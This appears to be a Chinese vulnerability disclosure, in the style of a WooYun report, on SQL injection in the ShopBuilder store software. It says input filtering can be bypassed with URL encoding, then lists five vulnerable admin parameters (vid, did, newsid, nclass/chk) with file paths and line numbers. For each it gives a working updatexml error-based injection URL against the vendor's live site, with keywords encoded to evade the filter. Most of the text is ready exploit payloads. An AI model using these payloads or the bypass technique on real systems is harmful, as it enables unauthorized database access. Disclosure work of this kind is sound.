首先get类型是有过滤的
不过这个过滤我们可以无视,url编码即可绕过
#1
module\vote\admin\vote.php(审核看清了哦 和这个不一样的 WooYun: ShopBuilder商城 v5.6.1 sql注入 #1 )
49行
vid 没有过滤
官网测试 http://www.a5shop.cn/?m=vote/admin&s=vote&vid=11%20and%201=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29
#2
module\vote\admin\vote_list.php
did没有过滤然后带入id进行了查询
官网测试
http://www.a5shop.cn/?m=vote/admin&s=vote_list&did=11%20and%201=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29
#3
module\news\admin\news.php
92 行
newsid没有过滤
官网测试
http://www.a5shop.cn/?m=news/admin&s=news&newsid=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29
#4
module\news\admin\newslist.php
开头处
官网测试
http://www.a5shop.cn/?m=news/admin&s=newslist&did=1%29%20and%201=updatexml%281,concat%280x5c,%28select%20user%28%29%29%29,1%29%23
#5
module\news\admin\newslist.php
37行
nclass不为空且chk为数组时 带入了数据库
官网测试
http://www.a5shop.cn/?m=news/admin&s=newslist&nclass=1&chk[]=1%29 and 1=updatexml%281,concat%280x5c,%28%73elect user%28%29%29%29,1%29%23